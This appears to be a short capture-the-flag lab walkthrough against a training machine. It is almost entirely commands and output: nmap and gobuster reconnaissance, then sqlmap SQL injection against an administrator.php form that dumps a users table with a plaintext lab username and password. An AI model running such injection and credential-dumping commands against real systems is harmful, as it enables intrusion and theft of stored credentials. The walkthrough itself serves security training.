Tools & Commands

2 - Enumeration

$ nmap 10.10.249.70 -v
22/tcp open  ssh
80/tcp open  http

$ nmap 10.10.249.70 -v -A -p22,80
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
|   256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA)
|_  256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3 - Web Enumeration

$ gobuster dir -u 10.10.249.70 -w /usr/share/wordlists/dirb/big.txt -x "php,txt"

4 - Web Exploitation

$ sqlmap -u <http://10.10.239.224/administrator.php> --forms -dbs
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users

$ sqlmap -u <http://10.10.239.224/administrator.php> --forms -D users --tables
Database: users
[1 table]
+-------+
| users |
+-------+

$ sqlmap -u <http://10.10.239.224/administrator.php> --forms -D users -T users --columns
Database: users
Table: users
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
| username | varchar(100) |
+----------+--------------+

$ sqlmap -u <http://10.10.239.224/administrator.php> --forms -D users -T users --dump
Database: users
Table: users
[1 entry]
+----------+------------+
| username | password   |
+----------+------------+
| pingudad | secretpass |
+----------+------------+

5 - Command Execution

login with creds